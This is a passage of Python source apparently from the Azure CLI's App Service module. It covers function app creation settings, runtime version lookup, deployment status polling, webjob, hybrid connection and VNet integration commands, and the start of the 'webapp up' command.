runtime_version: if runtime == 'dotnet': raise CLIError('--runtime-version is not supported for --runtime dotnet. Dotnet version is determined ' 'by --functions-version. Dotnet version {} is not supported by Functions version {}.' .format(runtime_version, functions_version)) raise CLIError('--runtime-version {} is not supported for the selected --runtime {} and ' '--functions-version {}. Supported versions are: {}.' .format(runtime_version, runtime, functions_version, ', '.join(supported_runtime_versions))) # if runtime_version was not specified, then that runtime is not supported for that functions version raise CLIError('no supported --runtime-version found for the selected --runtime {} and ' '--functions-version {}' .format(runtime, functions_version)) if runtime == 'dotnet': logger.warning('--runtime-version is not supported for --runtime dotnet. Dotnet version is determined by ' '--functions-version. Dotnet version will be %s for this function app.', runtime_version_json[KEYS.DISPLAY_VERSION]) if runtime_version_json[KEYS.IS_DEPRECATED]: logger.warning('%s version %s has been deprecated. In the future, this version will be unavailable. ' 'Please update your command to use a more recent version. For a list of supported ' '--runtime-versions, run \"az functionapp create -h\"', runtime_json[KEYS.PROPERTIES][KEYS.DISPLAY], runtime_version_json[KEYS.DISPLAY_VERSION]) site_config_json = runtime_version_json[KEYS.SITE_CONFIG_DICT] app_settings_json = runtime_version_json[KEYS.APP_SETTINGS_DICT] con_string = _validate_and_get_connection_string(cmd.cli_ctx, resource_group_name, storage_account) if is_linux: functionapp_def.kind = 'functionapp,linux' functionapp_def.reserved = True is_consumption = consumption_plan_location is not None if not is_consumption: site_config.app_settings.append(NameValuePair(name='MACHINEKEY_DecryptionKey', value=str(hexlify(urandom(32)).decode()).upper())) if deployment_container_image_name: functionapp_def.kind = 'functionapp,linux,container' site_config.app_settings.append(NameValuePair(name='DOCKER_CUSTOM_IMAGE_NAME', value=deployment_container_image_name)) site_config.app_settings.append(NameValuePair(name='FUNCTION_APP_EDIT_MODE', value='readOnly')) site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE', value='false')) site_config.linux_fx_version = _format_fx_version(deployment_container_image_name) # clear all runtime specific configs and settings site_config_json = {KEYS.USE_32_BIT_WORKER_PROC: False} app_settings_json = {} # ensure that app insights is created if not disabled runtime_version_json[KEYS.APPLICATION_INSIGHTS] = True else: site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE', value='true')) else: functionapp_def.kind = 'functionapp' # set site configs for prop, value in site_config_json.items(): snake_case_prop = _convert_camel_to_snake_case(prop) setattr(site_config, snake_case_prop, value) # temporary workaround for dotnet-isolated linux consumption apps if is_linux and consumption_plan_location is not None and runtime == 'dotnet-isolated': site_config.linux_fx_version = '' # adding app settings for app_setting, value in app_settings_json.items(): site_config.app_settings.append(NameValuePair(name=app_setting, value=value)) site_config.app_settings.append(NameValuePair(name='FUNCTIONS_EXTENSION_VERSION', value=_get_extension_version_functionapp(functions_version))) site_config.app_settings.append(NameValuePair(name='AzureWebJobsStorage', value=con_string)) # If plan is not consumption or elastic premium, we need to set always on if consumption_plan_location is None and not is_plan_elastic_premium(cmd, plan_info): site_config.always_on = True # If plan is elastic premium or consumption, we need these app settings if is_plan_elastic_premium(cmd, plan_info) or consumption_plan_location is not None: site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTAZUREFILECONNECTIONSTRING', value=con_string)) site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTSHARE', value=_get_content_share_name(name))) create_app_insights = False if app_insights_key is not None: site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY', value=app_insights_key)) elif app_insights is not None: instrumentation_key = get_app_insights_key(cmd.cli_ctx, resource_group_name, app_insights) site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY', value=instrumentation_key)) elif disable_app_insights or not runtime_version_json[KEYS.APPLICATION_INSIGHTS]: # set up dashboard if no app insights site_config.app_settings.append(NameValuePair(name='AzureWebJobsDashboard', value=con_string)) elif not disable_app_insights and runtime_version_json[KEYS.APPLICATION_INSIGHTS]: create_app_insights = True poller = client.web_apps.begin_create_or_update(resource_group_name, name, functionapp_def) functionapp = LongRunningOperation(cmd.cli_ctx)(poller) if consumption_plan_location and is_linux: logger.warning("Your Linux function app '%s', that uses a consumption plan has been successfully " "created but is not active until content is published using " "Azure Portal or the Functions Core Tools.", name) else: _set_remote_or_local_git(cmd, functionapp, resource_group_name, name, deployment_source_url, deployment_source_branch, deployment_local_git) if create_app_insights: try: try_create_application_insights(cmd, functionapp) except Exception: # pylint: disable=broad-except logger.warning('Error while trying to create and configure an Application Insights for the Function App. ' 'Please use the Azure Portal to create and configure the Application Insights, if needed.') update_app_settings(cmd, functionapp.resource_group, functionapp.name, ['AzureWebJobsDashboard={}'.format(con_string)]) if deployment_container_image_name: update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url, deployment_container_image_name, docker_registry_server_user, docker_registry_server_password) if assign_identities is not None: identity = assign_identity(cmd, resource_group_name, name, assign_identities, role, None, scope) functionapp.identity = identity return functionapp def _load_runtime_stacks_json_functionapp(is_linux): KEYS = FUNCTIONS_STACKS_API_KEYS() if is_linux: return get_file_json(FUNCTIONS_STACKS_API_JSON_PATHS['linux'])[KEYS.VALUE] return get_file_json(FUNCTIONS_STACKS_API_JSON_PATHS['windows'])[KEYS.VALUE] def _get_matching_runtime_json_functionapp(stacks_json, runtime): KEYS = FUNCTIONS_STACKS_API_KEYS() matching_runtime_json = list(filter(lambda x: x[KEYS.NAME] == runtime, stacks_json)) if matching_runtime_json: return matching_runtime_json[0] return None def _get_supported_runtime_versions_functionapp(runtime_json, functions_version): KEYS = FUNCTIONS_STACKS_API_KEYS() extension_version = _get_extension_version_functionapp(functions_version) supported_versions_list = [] for runtime_version_json in runtime_json[KEYS.PROPERTIES][KEYS.MAJOR_VERSIONS]: if extension_version in runtime_version_json[KEYS.SUPPORTED_EXTENSION_VERSIONS]: supported_versions_list.append(runtime_version_json) return supported_versions_list def _get_matching_runtime_version_json_functionapp(runtime_json, functions_version, runtime_version, is_linux): KEYS = FUNCTIONS_STACKS_API_KEYS() extension_version = _get_extension_version_functionapp(functions_version) if runtime_version: for runtime_version_json in runtime_json[KEYS.PROPERTIES][KEYS.MAJOR_VERSIONS]: if (runtime_version_json[KEYS.DISPLAY_VERSION] == runtime_version and extension_version in runtime_version_json[KEYS.SUPPORTED_EXTENSION_VERSIONS]): return runtime_version_json return None # find the matching default runtime version supported_versions_list = _get_supported_runtime_versions_functionapp(runtime_json, functions_version) default_version_json = {} default_version = 0.0 for current_runtime_version_json in supported_versions_list: if current_runtime_version_json[KEYS.IS_DEFAULT]: current_version = _get_runtime_version_functionapp(current_runtime_version_json[KEYS.RUNTIME_VERSION], is_linux) if not default_version_json or default_version < current_version: default_version_json = current_runtime_version_json default_version = current_version return default_version_json def _get_extension_version_functionapp(functions_version): if functions_version is not None: return '~{}'.format(functions_version) return '~2' def _get_app_setting_set_functionapp(site_config, app_setting): return list(filter(lambda x: x.name == app_setting, site_config.app_settings)) def _convert_camel_to_snake_case(text): return reduce(lambda x, y: x + ('_' if y.isupper() else '') + y, text).lower() def _get_runtime_version_functionapp(version_string, is_linux): import re windows_match = re.fullmatch(FUNCTIONS_WINDOWS_RUNTIME_VERSION_REGEX, version_string) if windows_match: return float(windows_match.group(1)) linux_match = re.fullmatch(FUNCTIONS_LINUX_RUNTIME_VERSION_REGEX, version_string) if linux_match: return float(linux_match.group(1)) try: return float(version_string) except ValueError: return 0 def _get_content_share_name(app_name): # content share name should be up to 63 characters long, lowercase letter and digits, and random # so take the first 50 characters of the app name and add the last 12 digits of a random uuid share_name = app_name[0:50] suffix = str(uuid.uuid4()).split('-')[-1] return share_name.lower() + suffix def try_create_application_insights(cmd, functionapp): creation_failed_warn = 'Unable to create the Application Insights for the Function App. ' \ 'Please use the Azure Portal to manually create and configure the Application Insights, ' \ 'if needed.' ai_resource_group_name = functionapp.resource_group ai_name = functionapp.name ai_location = functionapp.location app_insights_client = get_mgmt_service_client(cmd.cli_ctx, ApplicationInsightsManagementClient) ai_properties = { "name": ai_name, "location": ai_location, "kind": "web", "properties": { "Application_Type": "web" } } appinsights = app_insights_client.components.create_or_update(ai_resource_group_name, ai_name, ai_properties) if appinsights is None or appinsights.instrumentation_key is None: logger.warning(creation_failed_warn) return # We make this success message as a warning to no interfere with regular JSON output in stdout logger.warning('Application Insights \"%s\" was created for this Function App. ' 'You can visit https://portal.azure.com/#resource%s/overview to view your ' 'Application Insights component', appinsights.name, appinsights.id) update_app_settings(cmd, functionapp.resource_group, functionapp.name, ['APPINSIGHTS_INSTRUMENTATIONKEY={}'.format(appinsights.instrumentation_key)]) def _set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url=None, deployment_source_branch='master', deployment_local_git=None): if deployment_source_url: logger.warning("Linking to git repository '%s'", deployment_source_url) try: config_source_control(cmd, resource_group_name, name, deployment_source_url, 'git', deployment_source_branch, manual_integration=True) except Exception as ex: # pylint: disable=broad-except ex = ex_handler_factory(no_throw=True)(ex) logger.warning("Link to git repository failed due to error '%s'", ex) if deployment_local_git: local_git_info = enable_local_git(cmd, resource_group_name, name) logger.warning("Local git is configured with url of '%s'", local_git_info['url']) setattr(webapp, 'deploymentLocalGitUrl', local_git_info['url']) def _validate_and_get_connection_string(cli_ctx, resource_group_name, storage_account): sa_resource_group = resource_group_name if is_valid_resource_id(storage_account): sa_resource_group = parse_resource_id(storage_account)['resource_group'] storage_account = parse_resource_id(storage_account)['name'] storage_client = get_mgmt_service_client(cli_ctx, StorageManagementClient) storage_properties = storage_client.storage_accounts.get_properties(sa_resource_group, storage_account) error_message = '' endpoints = storage_properties.primary_endpoints sku = storage_properties.sku.name allowed_storage_types = ['Standard_GRS', 'Standard_RAGRS', 'Standard_LRS', 'Standard_ZRS', 'Premium_LRS', 'Standard_GZRS'] # pylint: disable=line-too-long for e in ['blob', 'queue', 'table']: if not getattr(endpoints, e, None): error_message = "Storage account '{}' has no '{}' endpoint. It must have table, queue, and blob endpoints all enabled".format(storage_account, e) # pylint: disable=line-too-long if sku not in allowed_storage_types: error_message += 'Storage type {} is not allowed'.format(sku) if error_message: raise CLIError(error_message) obj = storage_client.storage_accounts.list_keys(sa_resource_group, storage_account) # pylint: disable=no-member try: keys = [obj.keys[0].value, obj.keys[1].value] # pylint: disable=no-member except AttributeError: # Older API versions have a slightly different structure keys = [obj.key1, obj.key2] # pylint: disable=no-member endpoint_suffix = cli_ctx.cloud.suffixes.storage_endpoint connection_string = 'DefaultEndpointsProtocol={};EndpointSuffix={};AccountName={};AccountKey={}'.format( "https", endpoint_suffix, storage_account, keys[0]) # pylint: disable=no-member return connection_string def list_consumption_locations(cmd): client = web_client_factory(cmd.cli_ctx) regions = client.list_geo_regions(sku='Dynamic') return [{'name': x.name.lower().replace(' ', '')} for x in regions] def list_locations(cmd, sku, linux_workers_enabled=None): web_client = web_client_factory(cmd.cli_ctx) full_sku = get_sku_name(sku) web_client_geo_regions = web_client.list_geo_regions(sku=full_sku, linux_workers_enabled=linux_workers_enabled) providers_client = providers_client_factory(cmd.cli_ctx) providers_client_locations_list = getattr(providers_client.get('Microsoft.Web'), 'resource_types', []) for resource_type in providers_client_locations_list: if resource_type.resource_type == 'sites': providers_client_locations_list = resource_type.locations break return [geo_region for geo_region in web_client_geo_regions if geo_region.name in providers_client_locations_list] def _check_zip_deployment_status(cmd, rg_name, name, deployment_status_url, authorization, timeout=None): import requests from azure.cli.core.util import should_disable_connection_verify total_trials = (int(timeout) // 2) if timeout else 450 num_trials = 0 while num_trials < total_trials: time.sleep(2) response = requests.get(deployment_status_url, headers=authorization, verify=not should_disable_connection_verify()) try: res_dict = response.json() except json.decoder.JSONDecodeError: logger.warning("Deployment status endpoint %s returns malformed data. Retrying...", deployment_status_url) res_dict = {} finally: num_trials = num_trials + 1 if res_dict.get('status', 0) == 3: _configure_default_logging(cmd, rg_name, name) raise CLIError("Zip deployment failed. {}. Please run the command az webapp log deployment show " "-n {} -g {}".format(res_dict, name, rg_name)) if res_dict.get('status', 0) == 4: break if 'progress' in res_dict: logger.info(res_dict['progress']) # show only in debug mode, customers seem to find this confusing # if the deployment is taking longer than expected if res_dict.get('status', 0) != 4: _configure_default_logging(cmd, rg_name, name) raise CLIError("""Timeout reached by the command, however, the deployment operation is still on-going. Navigate to your scm site to check the deployment status""") return res_dict def list_continuous_webjobs(cmd, resource_group_name, name, slot=None): return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_continuous_web_jobs', slot) def start_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None): client = web_client_factory(cmd.cli_ctx) if slot: client.web_apps.start_continuous_web_job_slot(resource_group_name, name, webjob_name, slot) return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot) client.web_apps.start_continuous_web_job(resource_group_name, name, webjob_name) return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name) def stop_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None): client = web_client_factory(cmd.cli_ctx) if slot: client.web_apps.stop_continuous_web_job_slot(resource_group_name, name, webjob_name, slot) return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot) client.web_apps.stop_continuous_web_job(resource_group_name, name, webjob_name) return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name) def remove_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None): client = web_client_factory(cmd.cli_ctx) if slot: return client.web_apps.delete_continuous_web_job_slot(resource_group_name, name, webjob_name, slot) return client.web_apps.delete_continuous_web_job(resource_group_name, name, webjob_name) def list_triggered_webjobs(cmd, resource_group_name, name, slot=None): return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_triggered_web_jobs', slot) def run_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None): client = web_client_factory(cmd.cli_ctx) if slot: client.web_apps.run_triggered_web_job_slot(resource_group_name, name, webjob_name, slot) return client.web_apps.get_triggered_web_job_slot(resource_group_name, name, webjob_name, slot) client.web_apps.run_triggered_web_job(resource_group_name, name, webjob_name) return client.web_apps.get_triggered_web_job(resource_group_name, name, webjob_name) def remove_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None): client = web_client_factory(cmd.cli_ctx) if slot: return client.web_apps.delete_triggered_web_job_slot(resource_group_name, name, webjob_name, slot) return client.web_apps.delete_triggered_web_job(resource_group_name, name, webjob_name) def list_hc(cmd, name, resource_group_name, slot=None): client = web_client_factory(cmd.cli_ctx) if slot is None: listed_vals = client.web_apps.list_hybrid_connections(resource_group_name, name) else: listed_vals = client.web_apps.list_hybrid_connections_slot(resource_group_name, name, slot) # reformats hybrid connection, to prune unnecessary fields mod_list = [] for x in listed_vals.additional_properties["value"]: properties = x["properties"] resourceGroup = x["id"].split("/") mod_hc = { "id": x["id"], "location": x["location"], "name": x["name"], "properties": { "hostname": properties["hostname"], "port": properties["port"], "relayArmUri": properties["relayArmUri"], "relayName": properties["relayName"], "serviceBusNamespace": properties["serviceBusNamespace"], "serviceBusSuffix": properties["serviceBusSuffix"] }, "resourceGroup": resourceGroup[4], "type": x["type"] } mod_list.append(mod_hc) return mod_list def add_hc(cmd, name, resource_group_name, namespace, hybrid_connection, slot=None): HybridConnection = cmd.get_models('HybridConnection') web_client = web_client_factory(cmd.cli_ctx) hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx) namespace_client = namespaces_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx) hy_co_id = '' for n in namespace_client.list(): logger.warning(n.name) if n.name == namespace: hy_co_id = n.id if hy_co_id == '': raise ResourceNotFoundError('Azure Service Bus Relay namespace {} was not found.'.format(namespace)) i = 0 hy_co_resource_group = '' hy_co_split = hy_co_id.split("/") for z in hy_co_split: if z == "resourceGroups": hy_co_resource_group = hy_co_split[i + 1] i = i + 1 # calling the relay API to get information about the hybrid connection hy_co = hy_co_client.get(hy_co_resource_group, namespace, hybrid_connection) # if the hybrid connection does not have a default sender authorization # rule, create it hy_co_rules = hy_co_client.list_authorization_rules(hy_co_resource_group, namespace, hybrid_connection) has_default_sender_key = False for r in hy_co_rules: if r.name.lower() == "defaultsender": for z in r.rights: if z == z.send: has_default_sender_key = True if not has_default_sender_key: rights = [AccessRights.send] hy_co_client.create_or_update_authorization_rule(hy_co_resource_group, namespace, hybrid_connection, "defaultSender", rights) hy_co_keys = hy_co_client.list_keys(hy_co_resource_group, namespace, hybrid_connection, "defaultSender") hy_co_info = hy_co.id hy_co_metadata = ast.literal_eval(hy_co.user_metadata) hy_co_hostname = '' for x in hy_co_metadata: if x["key"] == "endpoint": hy_co_hostname = x["value"] hostname_parts = hy_co_hostname.split(":") hostname = hostname_parts[0] port = hostname_parts[1] id_parameters = hy_co_info.split("/") # populate object with information from the hybrid connection, and set it # on webapp hc = HybridConnection(service_bus_namespace=id_parameters[8], relay_name=hybrid_connection, relay_arm_uri=hy_co_info, hostname=hostname, port=port, send_key_name="defaultSender", send_key_value=hy_co_keys.primary_key, service_bus_suffix=".servicebus.windows.net") if slot is None: return_hc = web_client.web_apps.create_or_update_hybrid_connection(resource_group_name, name, namespace, hybrid_connection, hc) else: return_hc = web_client.web_apps.create_or_update_hybrid_connection_slot(resource_group_name, name, namespace, hybrid_connection, slot, hc) # reformats hybrid connection, to prune unnecessary fields resourceGroup = return_hc.id.split("/") mod_hc = { "hostname": return_hc.hostname, "id": return_hc.id, "location": return_hc.additional_properties["location"], "name": return_hc.name, "port": return_hc.port, "relayArmUri": return_hc.relay_arm_uri, "resourceGroup": resourceGroup[4], "serviceBusNamespace": return_hc.service_bus_namespace, "serviceBusSuffix": return_hc.service_bus_suffix } return mod_hc # set the key the apps use to connect with the hybrid connection def set_hc_key(cmd, plan, resource_group_name, namespace, hybrid_connection, key_type): HybridConnection = cmd.get_models('HybridConnection') web_client = web_client_factory(cmd.cli_ctx) # extract the hybrid connection resource group asp_hy_co = web_client.app_service_plans.get_hybrid_connection(resource_group_name, plan, namespace, hybrid_connection) arm_uri = asp_hy_co.relay_arm_uri split_uri = arm_uri.split("resourceGroups/") resource_group_strings = split_uri[1].split('/') relay_resource_group = resource_group_strings[0] hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx) # calling the relay function to obtain information about the hc in question hy_co = hy_co_client.get(relay_resource_group, namespace, hybrid_connection) # if the hybrid connection does not have a default sender authorization # rule, create it hy_co_rules = hy_co_client.list_authorization_rules(relay_resource_group, namespace, hybrid_connection) has_default_sender_key = False for r in hy_co_rules: if r.name.lower() == "defaultsender": for z in r.rights: if z == z.send: has_default_sender_key = True if not has_default_sender_key: rights = [AccessRights.send] hy_co_client.create_or_update_authorization_rule(relay_resource_group, namespace, hybrid_connection, "defaultSender", rights) hy_co_keys = hy_co_client.list_keys(relay_resource_group, namespace, hybrid_connection, "defaultSender") hy_co_metadata = ast.literal_eval(hy_co.user_metadata) hy_co_hostname = 0 for x in hy_co_metadata: if x["key"] == "endpoint": hy_co_hostname = x["value"] hostname_parts = hy_co_hostname.split(":") hostname = hostname_parts[0] port = hostname_parts[1] key = "empty" if key_type.lower() == "primary": key = hy_co_keys.primary_key elif key_type.lower() == "secondary": key = hy_co_keys.secondary_key # enures input is correct if key == "empty": logger.warning("Key type is invalid - must be primary or secondary") return apps = web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan, namespace, hybrid_connection) # changes the key for every app that uses that hybrid connection for x in apps: app_info = ast.literal_eval(x) app_name = app_info["name"] app_id = app_info["id"] id_split = app_id.split("/") app_resource_group = id_split[4] hc = HybridConnection(service_bus_namespace=namespace, relay_name=hybrid_connection, relay_arm_uri=arm_uri, hostname=hostname, port=port, send_key_name="defaultSender", send_key_value=key) web_client.web_apps.update_hybrid_connection(app_resource_group, app_name, namespace, hybrid_connection, hc) return web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan, namespace, hybrid_connection) def appservice_list_vnet(cmd, resource_group_name, plan): web_client = web_client_factory(cmd.cli_ctx) return web_client.app_service_plans.list_vnets(resource_group_name, plan) def remove_hc(cmd, resource_group_name, name, namespace, hybrid_connection, slot=None): linux_webapp = show_webapp(cmd, resource_group_name, name, slot) is_linux = linux_webapp.reserved if is_linux: return logger.warning("hybrid connections not supported on a linux app.") client = web_client_factory(cmd.cli_ctx) if slot is None: return_hc = client.web_apps.delete_hybrid_connection(resource_group_name, name, namespace, hybrid_connection) else: return_hc = client.web_apps.delete_hybrid_connection_slot(resource_group_name, name, namespace, hybrid_connection, slot) return return_hc def list_vnet_integration(cmd, name, resource_group_name, slot=None): client = web_client_factory(cmd.cli_ctx) if slot is None: result = list(client.web_apps.list_vnet_connections(resource_group_name, name)) else: result = list(client.web_apps.list_vnet_connections_slot(resource_group_name, name, slot)) mod_list = [] # reformats the vnet entry, removing unecessary information for x in result: # removes GUIDs from name and id longName = x.name if '_' in longName: usIndex = longName.index('_') shortName = longName[usIndex + 1:] else: shortName = longName v_id = x.id lastSlash = v_id.rindex('/') shortId = v_id[:lastSlash] + '/' + shortName # extracts desired fields certThumbprint = x.cert_thumbprint location = x.additional_properties["location"] v_type = x.type vnet_resource_id = x.vnet_resource_id id_strings = v_id.split('/') resourceGroup = id_strings[4] routes = x.routes vnet_mod = {"certThumbprint": certThumbprint, "id": shortId, "location": location, "name": shortName, "resourceGroup": resourceGroup, "routes": routes, "type": v_type, "vnetResourceId": vnet_resource_id} mod_list.append(vnet_mod) return mod_list def add_webapp_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot=None, skip_delegation_check=False): return _add_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot, skip_delegation_check, True) def add_functionapp_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot=None, skip_delegation_check=False): return _add_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot, skip_delegation_check, False) def _add_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot=None, skip_delegation_check=False, is_webapp=True): from azure.mgmt.web.models import SitePatchResource subnet_info = _get_subnet_info(cmd=cmd, resource_group_name=resource_group_name, subnet=subnet, vnet=vnet) client = web_client_factory(cmd.cli_ctx) if is_webapp: app = show_webapp(cmd, resource_group_name, name, slot) else: app = show_functionapp(cmd, resource_group_name, name, slot) parsed_plan = parse_resource_id(app.app_service_plan_id) plan_info = client.app_service_plans.get(parsed_plan['resource_group'], parsed_plan["name"]) _validate_vnet_integration_location(cmd=cmd, webapp_location=plan_info.location, subnet_resource_group=subnet_info["resource_group_name"], vnet_name=subnet_info["vnet_name"]) if skip_delegation_check: logger.warning('Skipping delegation check. Ensure that subnet is delegated to Microsoft.Web/serverFarms.' ' Missing delegation can cause "Bad Request" error.') else: _vnet_delegation_check(cmd, subnet_subscription_id=subnet_info["subnet_subscription_id"], vnet_resource_group=subnet_info["resource_group_name"], vnet_name=subnet_info["vnet_name"], subnet_name=subnet_info["subnet_name"]) subnet_id = subnet_info["subnet_resource_id"] if not slot: client.web_apps.update(resource_group_name=resource_group_name, name=name, site_envelope=SitePatchResource(virtual_network_subnet_id=subnet_id)) else: client.web_apps.update_slot(resource_group_name=resource_group_name, name=name, slot=slot, site_envelope=SitePatchResource(virtual_network_subnet_id=subnet_id)) # Enable Route All configuration config = get_site_configs(cmd, resource_group_name, name, slot) if config.vnet_route_all_enabled is not True: config = update_site_configs(cmd, resource_group_name, name, slot=slot, vnet_route_all_enabled='true') return { "id": subnet_info["vnet_resource_id"], "location": plan_info.location, # must be the same as vnet location bc of validation check "name": subnet_info["vnet_name"], "resourceGroup": subnet_info["resource_group_name"], "subnetResourceId": subnet_info["subnet_resource_id"] } def _vnet_delegation_check(cmd, subnet_subscription_id, vnet_resource_group, vnet_name, subnet_name): from azure.cli.core.commands.client_factory import get_subscription_id Delegation = cmd.get_models('Delegation', resource_type=ResourceType.MGMT_NETWORK) vnet_client = network_client_factory(cmd.cli_ctx) if get_subscription_id(cmd.cli_ctx).lower() != subnet_subscription_id.lower(): logger.warning('Cannot validate subnet in other subscription for delegation to Microsoft.Web/serverFarms.' ' Missing delegation can cause "Bad Request" error.') logger.warning('To manually add a delegation, use the command: az network vnet subnet update ' '--resource-group %s ' '--name %s ' '--vnet-name %s ' '--delegations Microsoft.Web/serverFarms', vnet_resource_group, subnet_name, vnet_name) else: subnetObj = vnet_client.subnets.get(vnet_resource_group, vnet_name, subnet_name) delegations = subnetObj.delegations delegated = False for d in delegations: if d.service_name.lower() == "microsoft.web/serverfarms".lower(): delegated = True if not delegated: subnetObj.delegations = [Delegation(name="delegation", service_name="Microsoft.Web/serverFarms")] vnet_client.subnets.begin_create_or_update(vnet_resource_group, vnet_name, subnet_name, subnet_parameters=subnetObj) def _validate_subnet(cli_ctx, subnet, vnet, resource_group_name): subnet_is_id = is_valid_resource_id(subnet) if subnet_is_id: subnet_id_parts = parse_resource_id(subnet) vnet_name = subnet_id_parts['name'] if not (vnet_name.lower() == vnet.lower() or subnet.startswith(vnet)): logger.warning('Subnet ID is valid. Ignoring vNet input.') return subnet vnet_is_id = is_valid_resource_id(vnet) if vnet_is_id: vnet_id_parts = parse_resource_id(vnet) return resource_id( subscription=vnet_id_parts['subscription'], resource_group=vnet_id_parts['resource_group'], namespace='Microsoft.Network', type='virtualNetworks', name=vnet_id_parts['name'], child_type_1='subnets', child_name_1=subnet) # Reuse logic from existing command to stay backwards compatible vnet_client = network_client_factory(cli_ctx) list_all_vnets = vnet_client.virtual_networks.list_all() vnets = [] for v in list_all_vnets: if vnet in (v.name, v.id): vnet_details = parse_resource_id(v.id) vnet_resource_group = vnet_details['resource_group'] vnets.append((v.id, v.name, vnet_resource_group)) if not vnets: return logger.warning("The virtual network %s was not found in the subscription.", vnet) # If more than one vnet, try to use one from same resource group. Otherwise, use first and log the vnet resource id found_vnet = [v for v in vnets if v[2].lower() == resource_group_name.lower()] if not found_vnet: found_vnet = [vnets[0]] (vnet_id, vnet, vnet_resource_group) = found_vnet[0] if len(vnets) > 1: logger.warning("Multiple virtual networks of name %s were found. Using virtual network with resource ID: %s. " "To use a different virtual network, specify the virtual network resource ID using --vnet.", vnet, vnet_id) vnet_id_parts = parse_resource_id(vnet_id) return resource_id( subscription=vnet_id_parts['subscription'], resource_group=vnet_id_parts['resource_group'], namespace='Microsoft.Network', type='virtualNetworks', name=vnet_id_parts['name'], child_type_1='subnets', child_name_1=subnet) def remove_vnet_integration(cmd, name, resource_group_name, slot=None): client = web_client_factory(cmd.cli_ctx) if slot is None: return_vnet = client.web_apps.delete_swift_virtual_network(resource_group_name, name) else: return_vnet = client.web_apps.delete_swift_virtual_network_slot(resource_group_name, name, slot) return return_vnet def get_history_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None): client = web_client_factory(cmd.cli_ctx) if slot: return client.web_apps.list_triggered_web_job_history_slot(resource_group_name, name, webjob_name, slot) return client.web_apps.list_triggered_web_job_history(resource_group_name, name, webjob_name) def webapp_up(cmd, name=None, resource_group_name=None, plan=None, location=None, sku=None, # pylint: disable=too-many-statements,too-many-branches os_type=None, runtime=None, dryrun=False, logs=False, launch_browser=False, html=False, app_service_environment=None): if not name: name = generate_default_app_name(cmd) import os AppServicePlan = cmd.get_models('AppServicePlan') src_dir = os.getcwd() _src_path_escaped = "{}".format(src_dir.replace(os.sep, os.sep + os.sep)) client = web_client_factory(cmd.cli_ctx) user = get_profile_username() _create_new_rg = False _site_availability = get_site_availability(cmd, name) _create_new_app = _site_availability.name_available os_name = os_type if os_type else detect_os_form_src(src_dir, html) _is_linux = os_name.lower() == 'linux' if runtime and html: raise CLIError('Conflicting parameters: cannot have both --runtime and --html specified.') if runtime: helper = _StackRuntimeHelper(cmd, client, linux=_is_linux) runtime = helper.remove_delimiters(runtime) match = helper.resolve(runtime) if not match: if _is_linux: raise CLIError("Linux runtime '{}' is not supported." " Please invoke 'az webapp list-runtimes --linux' to cross check".format(runtime)) raise CLIError("Windows runtime '{}' is not supported." " Please invoke 'az webapp list-runtimes' to cross check".format(runtime)) language = runtime.split('|')[0] version_used_create = '|'.join(runtime.split('|')[1:]) detected_version = '-' else: # detect the version _lang_details = get_lang_from_content(src_dir, html) language = _lang_details.get('language') _data = get_runtime_version_details(_lang_details.get('file_loc'), language) version_used_create = _data.get('to_create') detected_version = _data.get('detected') runtime_version = "{}|{}".format(language, version_used_create) if \ version_used_create != "-" else version_used_create site_config = None if not _create_new_app: # App exists, or App name unavailable if _site_availability.reason == 'Invalid': raise CLIError(_site_availability.message) # Get the ASP & RG info, if the ASP & RG parameters are provided we use those else we need to find those logger.warning("Webapp '%s' already exists. The command will deploy contents to the existing app.", name) app_details = get_app_details(cmd, name) if app_details is None: raise CLIError("Unable to retrieve details of the existing app '{}'. Please check that the app " "is a part of the current subscription if updating an existing app. If creating " "a new app, app names must be globally unique. Please try a more unique name or " "leave unspecified to receive a randomly generated name.".format(name)) current_rg = app_details.resource_group if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()): raise CLIError("The webapp '{}' exists in ResourceGroup '{}' and does not " "match the value entered '{}'. Please re-run command with the " "correct parameters.". format(name, current_rg, resource_group_name)) rg_name = resource_group_name or current_rg if location is None: loc = app_details.location.replace(" ", "").lower() else: loc = location.replace(" ", "").lower() plan_details = parse_resource_id(app_details.server_farm_id) current_plan = plan_details['name'] if plan is not None and current_plan.lower() != plan.lower(): raise CLIError("The plan name entered '{}' does not match the plan name that the webapp is hosted in '{}'." "Please check if you have configured defaults for plan name and re-run command." .format(plan, current_plan)) plan = plan or plan_details['name'] plan_info = client.app_service_plans.get(plan_details['resource_group'], plan) sku = plan_info.sku.name if isinstance(plan_info, AppServicePlan) else 'Free' current_os = 'Linux' if plan_info.reserved else 'Windows' # Raise error if current OS of the app is different from the current one if current_os.lower() != os_name.lower(): raise CLIError("The webapp '{}' 